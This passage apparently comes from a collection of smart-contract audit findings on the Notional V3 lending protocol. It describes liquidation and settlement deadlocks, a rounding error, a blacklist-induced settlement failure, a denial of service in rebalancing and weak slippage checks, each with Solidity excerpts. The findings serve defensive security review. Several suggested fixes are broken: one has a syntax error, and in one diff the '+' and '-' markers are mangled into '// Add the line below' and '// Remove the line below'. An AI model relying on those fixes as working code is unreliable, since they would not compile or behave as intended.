h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n \"Must Liquidate All Debt\"\\n );\\n } else {\\n // If the deposit amount is greater than maxLiquidatorDeposit then limit it to the max\\n // amount here.\\n depositUnderlyingInternal = maxLiquidatorDepositLocal;\\n }\\n```\\n\\nIf `depositUnderlyingInternal >= maxLiquidatorDepositLocal`, then the liquidator's deposit is capped to `maxLiquidatorDepositLocal`. However, `maxLiquidatorDepositLocal` may put the vault account's outstanding debt below the minimum borrow amount but not to zero.\\nHowever, because it is not possible to partially liquidate the account's debt, we reach a deadlock where it isn't possible to liquidate all outstanding debt and it also isn't possible to liquidate debt partially. So even though it may be possible to liquidate an account into a healthy position, the current implementation doesn't always allow for this to be true.ч`VaultValuation.getLiquidationFactors()` must be updated to allow for partial liquidations.\\n```\\nFile: VaultValuation.sol\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].neg().sub(depositUnderlyingInternal) >= minBorrowSize,\\n || h.debtOutstanding[currencyIndex].neg().sub(depositUnderlyingInternal) == 0\\n \"Must Liquidate All Debt\"\\n );\\n } else {\\n // If the deposit amount is greater than maxLiquidatorDeposit then limit it to the max\\n // amount here.\\n depositUnderlyingInternal = maxLiquidatorDepositLocal;\\n }\\n```\\nчCertain vault positions will never be eligible for liquidation and hence Notional may be left with bad debt. Liquidity providers will lose funds as they must cover the shortfall for undercollateralised positions.ч```\\nFile: VaultValuation.sol\\n int256 maxLiquidatorDepositLocal = _calculateDeleverageAmount(\\n vaultConfig,\\n h.vaultShareValueUnderlying,\\n h.totalDebtOutstandingInPrimary.neg(),\\n h.debtOutstanding[currencyIndex].neg(),\\n minBorrowSize,\\n exchangeRate,\\n er.rateDecimals\\n );\\n\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n \"Must Liquidate All Debt\"\\n );\\n } else {\\n // If the deposit amount is greater than maxLiquidatorDeposit then limit it to the max\\n // amount here.\\n depositUnderlyingInternal = maxLiquidatorDepositLocal;\\n }\\n```\\n -Vault accounts with excess cash can avoid being settledчhighчIf excess cash was transferred out from an account during account settlement, then the protocol will check the account's collateral ratio and revert if the position is unhealthy. Because it may not be possible to settle a vault account, liquidators cannot reduce account debt by purchasing vault shares because `_authenticateDeleverage()` will check to see if a vault has matured.\\nConsidering an account's health is determined by a combination of its outstanding debt, cash holdings and the total underlying value of its vault shares, transferring out excess cash may actually put an account in an unhealthy position.\\n```\\nFile: VaultAccountAction.sol\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, \"No Settle\");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n\\nIt is important to note that all vault liquidation actions require a vault to first be settled. Hence, through self-liquidation, sophisticated vault accounts can have excess cash in one currency and significant debt holdings in the vault's other currencies.\\n```\\nFile: VaultLiquidationAction.sol\\n function _authenticateDeleverage(\\n address account,\\n address vault,\\n address liquidator\\n ) private returns (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) {\\n // Do not allow invalid accounts to liquidate\\n requireValidAccount(liquidator);\\n require(liquidator != vault);\\n\\n // Cannot liquidate self, if a vault needs to deleverage itself as a whole it has other methods \\n // in VaultAction to do so.\\n require(account != msg.sender);\\n require(account != liquidator);\\n\\n vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n require(vaultConfig.getFlag(VaultConfiguration.DISABLE_DELEVERAGE) == false);\\n\\n // Authorization rules for deleveraging\\n if (vaultConfig.getFlag(VaultConfiguration.ONLY_VAULT_DELEVERAGE)) {\\n require(msg.sender == vault);\\n } else {\\n require(msg.sender == liquidator);\\n }\\n\\n vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n\\n // Vault accounts that are not settled must be settled first by calling settleVaultAccount\\n // before liquidation. settleVaultAccount is not permissioned so anyone may settle the account.\\n require(block.timestamp < vaultAccount.maturity, \"Must Settle\");\\n\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Returns the updated prime vault state\\n vaultState = vaultAccount.accruePrimeCashFeesToDebtInLiquidation(vaultConfig);\\n } else {\\n vaultState = VaultStateLib.getVaultState(vaultConfig, vaultAccount.maturity);\\n }\\n }\\n```\\n\\nConsider the following example:\\nAlice has a valid borrow position in the vault which is considered risky. She has a small bit of secondary cash but most of her debt is primary currency denominated. Generally speaking her vault is healthy. Upon settlement, the small bit of excess secondary cash is transferred out and her vault is undercollateralised and eligible for liquidation. However, we are deadlocked because it is not possible to settle the vault because `checkVaultAccountCollateralRatio()` will fail, and it's not possible to purchase the excess cash and offset the debt directly via `liquidateVaultCashBalance()` or `deleverageAccount()` because `_authenticateDeleverage()` will revert if a vault has not yet been settled.чConsider adding a liquidation method which settles a vault account and allows for a liquidator to purchase vault shares, offsetting outstanding debt, before performing collateral ratio checks.чVault accounts can create positions which will never be eligible for liquidation and the protocol may accrue bad debt.ч```\\nFile: VaultAccountAction.sol\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, \"No Settle\");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n -convertFromStorage() fails to use rounding-up when converting a negative storedCashBalance into signedPrimeSupplyValue.чmediumч`convertFromStorage()` fails to use rounding-up when converting a negative `storedCashBalance` into `signedPrimeSupplyValue`.\\n`convertFromStorage()` is used to convert `storedCashBalance` into `signedPrimeSupplyValue`. When `storedCashBalance` is negative, it represents a debt - positive prime cash owed.\\nUnfortunately, when converting a negative `storedCashBalance` into `signedPrimeSupplyValue`, the following division will apply a rounding-down (near zero) mode, leading to a user to owe less than it is supposed to be.\\n```\\nreturn storedCashBalance.mul(pr.debtFactor).div(pr.supplyFactor);\\n```\\n\\nThis is not acceptable. Typically, rounding should be in favor of the protocol, not in favor of the user to prevent draining of the protocol and losing funds of the protocol.\\nThe following POC shows a rounding-down will happen for a negative value division. The result of the following test is -3.\\n```\\nfunction testMod() public {\\n \\n int256 result = -14;\\n result = result / 4;\\n console2.logInt(result);\\n }\\n```\\nчUse rounding-up instead.\\n```\\nfunction convertFromStorage(\\n PrimeRate memory pr,\\n int256 storedCashBalance\\n ) internal pure returns (int256 signedPrimeSupplyValue) {\\n if (storedCashBalance >= 0) {\\n return storedCashBalance;\\n } else {\\n // Convert negative stored cash balance to signed prime supply value\\n // signedPrimeSupply = (negativePrimeDebt * debtFactor) / supplyFactor\\n\\n // cashBalance is stored as int88, debt factor is uint80 * uint80 so there\\n // is no chance of phantom overflow (88 // Add the line below\\n 80 // Add the line below\\n 80 = 248) on mul\\n// Remove the line below\\n return storedCashBalance.mul(pr.debtFactor).div(pr.supplyFactor);\\n// Add the line below\\n return (storedCashBalance.mul(pr.debtFactor).sub(pr.supplyFactor// Remove the line below\\n1)).div(pr.supplyFactor);\\n }\\n }\\n```\\nч`convertFromStorage()` fails to use rounding-up when converting a negative `storedCashBalance` into `signedPrimeSupplyValue`. The protocol is losing some dusts amount, but it can be accumulative or a vulnerability that can be exploited.ч```\\nreturn storedCashBalance.mul(pr.debtFactor).div(pr.supplyFactor);\\n```\\n -Cannot permissionless settle the vault account if the user use a blacklisted accountчmediumчCannot permissionless settle the vault account if the user use a blacklisted account\\nIn VaultAccoutnAction.sol, one of the critical function is\\n```\\n /// @notice Settles a matured vault account by transforming it from an fCash maturity into\\n /// a prime cash account. This method is not authenticated, anyone can settle a vault account\\n /// without permission. Generally speaking, this action is economically equivalent no matter\\n /// when it is called. In some edge conditions when the vault is holding prime cash, it is\\n /// advantageous for the vault account to have this called sooner. All vault account actions\\n /// will first settle the vault account before taking any further actions.\\n /// @param account the address to settle\\n /// @param vault the vault the account is in\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, \"No Settle\");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n\\nas the comment suggests, this function should be called permissionless\\nand the comment is, which means there should not be able to permissionless reject account settlement\\n```\\n/// will first settle the vault account before taking any further actions.\\n```\\n\\nthis is calling\\n```\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n```\\n\\nwhich calls\\n```\\n /// @notice Settles a matured vault account by transforming it from an fCash maturity into\\n /// a prime cash account. This method is not authenticated, anyone can settle a vault account\\n /// without permission. Generally speaking, this action is economically equivalent no matter\\n /// when it is called. In some edge conditions when the vault is holding prime cash, it is\\n /// advantageous for the vault account to have this called sooner. All vault account actions\\n /// will first settle the vault account before taking any further actions.\\n /// @param account the address to settle\\n /// @param vault the vault the account is in\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, \"No Settle\");\\n```\\n\\nbasically this calls\\n```\\n // Calculates the net settled cash if there is any temp cash balance that is net off\\n // against the settled prime debt.\\n bool didTransferPrimary;\\n (accountPrimeStorageValue, didTransferPrimary) = repayAccountPrimeDebtAtSettlement(\\n vaultConfig.primeRate,\\n primeVaultState,\\n vaultConfig.borrowCurrencyId,\\n vaultConfig.vault,\\n vaultAccount.account,\\n vaultAccount.tempCashBalance,\\n accountPrimeStorageValue\\n );\\n```\\n\\ncalling\\n```\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n didTransfer = false;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue;\\n \\n if (accountPrimeCash > 0) {\\n // netPrimeDebtRepaid is a negative number\\n int256 netPrimeDebtRepaid = pr.convertUnderlyingToDebtStorage(\\n pr.convertToUnderlying(accountPrimeCash).neg()\\n );\\n\\n int256 netPrimeDebtChange;\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n // In this case, part of the account's debt is repaid.\\n netPrimeDebtChange = netPrimeDebtRepaid;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue.sub(netPrimeDebtRepaid);\\n }\\n```\\n\\nthe token withdrawal logic above try to push ETH to accout\\n```\\nTokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n);\\n```\\n\\nthis is calling\\n```\\n function withdrawPrimeCash(\\n address account,\\n uint16 currencyId,\\n int256 primeCashToWithdraw,\\n PrimeRate memory primeRate,\\n bool withdrawWrappedNativeToken\\n ) internal returns (int256 netTransferExternal) {\\n if (primeCashToWithdraw == 0) return 0;\\n require(primeCashToWithdraw < 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n netTransferExternal = convertToExternal(\\n underlying, \\n primeRate.convertToUnderlying(primeCashToWithdraw) \\n );\\n\\n // Overflow not possible due to int256\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n _redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n\\n if (underlying.tokenType == TokenType.Ether) {\\n GenericToken.transferNativeTokenOut(account, withdrawAmount, withdrawWrappedNativeToken);\\n } else {\\n GenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n }\\n\\n _postTransferPrimeCashUpdate(account, currencyId, netTransferExternal, underlying, primeRate);\\n }\\n```\\n\\nnote the function call\\n```\\nif (underlying.tokenType == TokenType.Ether) {\\n GenericToken.transferNativeTokenOut(account, withdrawAmount, withdrawWrappedNativeToken);\\n} else {\\n GenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n}\\n```\\n\\nif the token type is not ETHER,\\nwe are transfer the underlying ERC20 token to the account\\n```\\nGenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n```\\n\\nthe token in-scoped is\\n```\\nERC20: Any Non-Rebasing token. ex. USDC, DAI, USDT (future), wstETH, WETH, WBTC, FRAX, CRV, etc.\\n```\\n\\nUSDC is common token that has blacklisted\\nif the account is blacklisted, the transfer would revert and the account cannot be settled!чmaybe let admin bypass the withdrawPrimeCash and force settle the account to not let settlement block further action!чwhat are the impact,\\nper comment\\n```\\n/// will first settle the vault account before taking any further actions.\\n```\\n\\nif that is too vague, I can list three, there are more!\\nthere are certain action that need to be done after the vault settlement, for example, liqudation require the vault settlement first\\nthere are case that require force vault settlement, actually one example is notional need to force the settle the vault during migration! (this is just the case to show user should be able to permissionless reject settlement)ч```\\n /// @notice Settles a matured vault account by transforming it from an fCash maturity into\\n /// a prime cash account. This method is not authenticated, anyone can settle a vault account\\n /// without permission. Generally speaking, this action is economically equivalent no matter\\n /// when it is called. In some edge conditions when the vault is holding prime cash, it is\\n /// advantageous for the vault account to have this called sooner. All vault account actions\\n /// will first settle the vault account before taking any further actions.\\n /// @param account the address to settle\\n /// @param vault the vault the account is in\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, \"No Settle\");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n -getAccountPrimeDebtBalance() always return 0чmediumчSpelling errors that result in `getAccountPrimeDebtBalance()` Always return 0\\n`getAccountPrimeDebtBalance()` use for Show current debt\\n```\\n function getAccountPrimeDebtBalance(uint16 currencyId, address account) external view override returns (\\n int256 debtBalance\\n ) {\\n mapping(address => mapping(uint256 => BalanceStorage)) storage store = LibStorage.getBalanceStorage();\\n BalanceStorage storage balanceStorage = store[account][currencyId];\\n int256 cashBalance = balanceStorage.cashBalance;\\n\\n // Only return cash balances less than zero\\n debtBalance = cashBalance < 0 ? debtBalance : 0; //<------@audit wrong, Always return 0\\n }\\n```\\n\\nIn the above code we can see that due to a spelling error, `debtBalance` always ==0 should use `debtBalance = cashBalance < 0 ? cashBalance : 0;`ч```\\n function getAccountPrimeDebtBalance(uint16 currencyId, address account) external view override returns (\\n int256 debtBalance\\n ) {\\n mapping(address => mapping(uint256 => BalanceStorage)) storage store = LibStorage.getBalanceStorage();\\n BalanceStorage storage balanceStorage = store[account][currencyId];\\n int256 cashBalance = balanceStorage.cashBalance;\\n\\n // Only return cash balances less than zero\\n- debtBalance = cashBalance < 0 ? debtBalance : 0;\\n+ debtBalance = cashBalance < 0 ? cashBalance : 0;\\n }\\n```\\nч`getAccountPrimeDebtBalance()` is the external method to check the debt If a third party integrates with notional protocol, this method will be used to determine whether the user has debt or not and handle it accordingly, which may lead to serious errors in the third party's businessч```\\n function getAccountPrimeDebtBalance(uint16 currencyId, address account) external view override returns (\\n int256 debtBalance\\n ) {\\n mapping(address => mapping(uint256 => BalanceStorage)) storage store = LibStorage.getBalanceStorage();\\n BalanceStorage storage balanceStorage = store[account][currencyId];\\n int256 cashBalance = balanceStorage.cashBalance;\\n\\n // Only return cash balances less than zero\\n debtBalance = cashBalance < 0 ? debtBalance : 0; //<------@audit wrong, Always return 0\\n }\\n```\\n -A single external protocol can DOS rebalancing processчmediumчA failure in an external money market can DOS the entire rebalance process in Notional.\\n```\\nFile: ProportionalRebalancingStrategy.sol\\n function calculateRebalance(\\n IPrimeCashHoldingsOracle oracle,\\n uint8[] calldata rebalancingTargets\\n ) external view override onlyNotional returns (RebalancingData memory rebalancingData) {\\n address[] memory holdings = oracle.holdings();\\n..SNIP..\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n..SNIP..\\n }\\n\\n rebalancingData.redeemData = oracle.getRedemptionCalldataForRebalancing(redeemHoldings, redeemAmounts);\\n rebalancingData.depositData = oracle.getDepositCalldataForRebalancing(depositHoldings, depositAmounts);\\n }\\n```\\n\\nDuring a rebalance, the `ProportionalRebalancingStrategy` will loop through all the holdings and perform a deposit or redemption against the external market of the holdings.\\nAssume that Notional integrates with four (4) external money markets (Aave V2, Aave V3, Compound V3, Morpho). In this case, whenever a rebalance is executed, Notional will interact with all four external money markets.\\n```\\nFile: TreasuryAction.sol\\n function _executeDeposits(Token memory underlyingToken, DepositData[] memory deposits) private {\\n..SNIP..\\n for (uint256 j; j < depositData.targets.length; ++j) {\\n // This will revert if the individual call reverts.\\n GenericToken.executeLowLevelCall(\\n depositData.targets[j], \\n depositData.msgValue[j], \\n depositData.callData[j]\\n );\\n }\\n```\\n\\n```\\nFile: TokenHandler.sol\\n function executeMoneyMarketRedemptions(\\n..SNIP..\\n for (uint256 j; j < data.targets.length; j++) {\\n // This will revert if the individual call reverts.\\n GenericToken.executeLowLevelCall(data.targets[j], 0, data.callData[j]);\\n }\\n```\\n\\nHowever, as long as one external money market reverts, the entire rebalance process will be reverted and Notional would not be able to rebalance its underlying assets.\\nThe call to the external money market can revert due to many reasons, which include the following:\\nChanges in the external protocol's interfaces (e.g. function signatures modified or functions added or removed)\\nThe external protocol is paused\\nThe external protocol has been compromised\\nThe external protocol suffers from an upgrade failure causing an error in the new contract code.чConsider implementing a more resilient rebalancing process that allows for failures in individual external money markets. For instance, Notional could catch reverts from individual money markets and continue the rebalancing process with the remaining markets.чNotional would not be able to rebalance its underlying holding if one of the external money markets causes a revert. The probability of this issue occurring increases whenever Notional integrates with a new external money market\\nThe key feature of Notional V3 is to allow its Treasury Manager to rebalance underlying holdings into various other money market protocols.\\nThis makes Notional more resilient to issues in external protocols and future-proofs the protocol. If rebalancing does not work, Notional will be unable to move its fund out of a vulnerable external market, potentially draining protocol funds if this is not mitigated.\\nAnother purpose of rebalancing is to allow Notional to allocate Notional V3's capital to new opportunities or protocols that provide a good return. If rebalancing does not work, the protocol and its users will lose out on the gain from the investment.\\nOn the other hand, if an external monkey market that Notional invested in is consistently underperforming or yielding negative returns, Notional will perform a rebalance to reallocate its funds to a better market. However, if rebalancing does not work, they will be stuck with a suboptimal asset allocation, and the protocol and its users will incur losses.ч```\\nFile: ProportionalRebalancingStrategy.sol\\n function calculateRebalance(\\n IPrimeCashHoldingsOracle oracle,\\n uint8[] calldata rebalancingTargets\\n ) external view override onlyNotional returns (RebalancingData memory rebalancingData) {\\n address[] memory holdings = oracle.holdings();\\n..SNIP..\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n..SNIP..\\n }\\n\\n rebalancingData.redeemData = oracle.getRedemptionCalldataForRebalancing(redeemHoldings, redeemAmounts);\\n rebalancingData.depositData = oracle.getDepositCalldataForRebalancing(depositHoldings, depositAmounts);\\n }\\n```\\n -Inadequate slippage controlчmediumчThe current slippage control mechanism checks a user's acceptable interest rate limit against the post-trade rate, which could result in trades proceeding at rates exceeding the user's defined limit.\\n```\\nFile: InterestRateCurve.sol\\n function _getNetCashAmountsUnderlying(\\n InterestRateParameters memory irParams,\\n MarketParameters memory market,\\n CashGroupParameters memory cashGroup,\\n int256 totalCashUnderlying,\\n int256 fCashToAccount,\\n uint256 timeToMaturity\\n ) private pure returns (int256 postFeeCashToAccount, int256 netUnderlyingToMarket, int256 cashToReserve) {\\n uint256 utilization = getfCashUtilization(fCashToAccount, market.totalfCash, totalCashUnderlying);\\n // Do not allow utilization to go above 100 on trading\\n if (utilization > uint256(Constants.RATE_PRECISION)) return (0, 0, 0);\\n uint256 preFeeInterestRate = getInterestRate(irParams, utilization);\\n\\n int256 preFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(preFeeInterestRate, timeToMaturity)\\n ).neg();\\n\\n uint256 postFeeInterestRate = getPostFeeInterestRate(irParams, preFeeInterestRate, fCashToAccount < 0);\\n postFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(postFeeInterestRate, timeToMaturity)\\n ).neg();\\n```\\n\\nWhen executing a fCash trade, the interest rate is computed based on the utilization of the current market (Refer to Line 432). The `postFeeInterestRate` is then computed based on the `preFeeCashToAccount` and trading fee, and this rate will be used to derive the exchange rate needed to convert `fCashToAccount` to the net prime cash (postFeeCashToAccount).\\nNote that the interest rate used for the trade is `postFeeInterestRate`, and `postFeeCashToAccount` is the amount of cash credit or debit to an account.\\nIf there is any slippage control in place, the slippage should be checked against the `postFeeInterestRate` or `postFeeCashToAccount`. As such, there are two approaches to implementing slippage controls:\\n1st Approach - The current interest rate is `2%`. User sets their acceptable interest rate limit at 3% when the user submits the trade transaction. The user's tolerance is `1%`. From the time the trade is initiated to when it's executed, the rate (postFeeInterestRate) rises to 5%, the transaction should revert due to the increased slippage beyond the user's tolerance.\\n2nd Approach - If a user sets the minimum trade return of 1000 cash, but the return is only 900 cash (postFeeCashToAccount) when the trade is executed, the transaction should revert as it exceeded the user's slippage tolerance\\nNote: When users submit a trade transaction, the transaction is held in the mempool for a period of time before executing, and thus the market condition and interest rate might change during this period, and slippage control is used to protect users from these fluctuations.\\nHowever, within the codebase, it was observed that the slippage was not checked against the `postFeeInterestRate` or `postFeeCashToAccount`.\\n```\\nFile: InterestRateCurve.sol\\n // returns the net cash amounts to apply to each of the three relevant balances.\\n (\\n int256 netUnderlyingToAccount,\\n int256 netUnderlyingToMarket,\\n int256 netUnderlyingToReserve\\n ) = _getNetCashAmountsUnderlying(\\n irParams,\\n market,\\n cashGroup,\\n totalCashUnderlying,\\n fCashToAccount,\\n timeToMaturity\\n );\\n..SNIP..\\n {\\n // Do not allow utilization to go above 100 on trading, calculate the utilization after\\n // the trade has taken effect, meaning that fCash changes and cash changes are applied to\\n // the market totals.\\n market.totalfCash = market.totalfCash.subNoNeg(fCashToAccount);\\n totalCashUnderlying = totalCashUnderlying.add(netUnderlyingToMarket);\\n\\n uint256 utilization = getfCashUtilization(0, market.totalfCash, totalCashUnderlying);\\n if (utilization > uint256(Constants.RATE_PRECISION)) return (0, 0);\\n\\n uint256 newPreFeeImpliedRate = getInterestRate(irParams, utilization);\\n..SNIP..\\n // Saves the preFeeInterestRate and fCash\\n market.lastImpliedRate = newPreFeeImpliedRate;\\n }\\n```\\n\\nAfter computing the net prime cash (postFeeCashToAccount == netUnderlyingToAccount) at Line 373 above, it updates the `market.totalfCash` and `totalCashUnderlying`. Line 395 computes the `utilization` after the trade happens, and uses the latest `utilization` to compute the new interest rate after the trade and save it within the `market.lastImpliedRate`\\n```\\nFile: TradingAction.sol\\n function _executeLendBorrowTrade(\\n..SNIP..\\n cashAmount = market.executeTrade(\\n account,\\n cashGroup,\\n fCashAmount,\\n market.maturity.sub(blockTime),\\n marketIndex\\n );\\n\\n uint256 rateLimit = uint256(uint32(bytes4(trade << 104)));\\n if (rateLimit != 0) {\\n if (tradeType == TradeActionType.Borrow) {\\n // Do not allow borrows over the rate limit\\n require(market.lastImpliedRate <= rateLimit, \"Trade failed, slippage\");\\n } else {\\n // Do not allow lends under the rate limit\\n require(market.lastImpliedRate >= rateLimit, \"Trade failed, slippage\");\\n }\\n }\\n }\\n```\\n\\nThe trade is executed at Line 256 above. After the trade is executed, it will check for the slippage at Line 264-273 above.\\nLet $IR_1$ be the interest rate used during the trade (postFeeInterestRate), $IR_2$ be the interest rate after the trade (market.lastImpliedRate), and $IR_U$ be the user's acceptable interest rate limit 